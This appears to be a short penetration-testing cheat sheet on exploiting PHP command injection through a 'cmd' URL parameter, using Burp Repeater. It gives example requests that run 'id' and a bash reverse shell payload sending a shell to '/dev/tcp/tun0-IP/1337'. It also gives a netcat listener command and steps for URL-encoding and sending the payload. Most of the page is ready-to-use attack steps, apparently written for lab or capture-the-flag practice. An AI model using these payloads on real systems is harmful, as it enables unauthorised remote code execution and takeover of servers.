{% embed url="https://owasp.org/www-community/attacks/Command_Injection" %} OWASP Reference {% endembed %}
PHP running on the site?
- Attempt RCE to see if PHP exec () or PHP passthru is being used to pass commands to the local system
- Simply add ?cmd=(command-here)
- This is even easier when you send the request to repeater and modify the request there
Example Burp Request:
GET /dashboard.php?cmd=id HTTP/1.1
- Now, within the Response tab, utilize the search function for user data if necessary
- Now that we confirmed that we have RCE, it is time to get a foothold on the target
- We need to make a reverse shell
- Attempt the bash reverse shell first
Initiate a Netcat listener:
nc -lnvp 1337
In the Repeater tab of Burp:
GET /dashboard.php?cmd=bash -c 'exec bash -i &>/dev/tcp/tun0-IP/1337 <&1'
- Highlight the reverse shell payload and do CTRL+U to URL encode
- Since it is a GET request, you absolutely need to URL encode!
- Send the request and see if you get a shell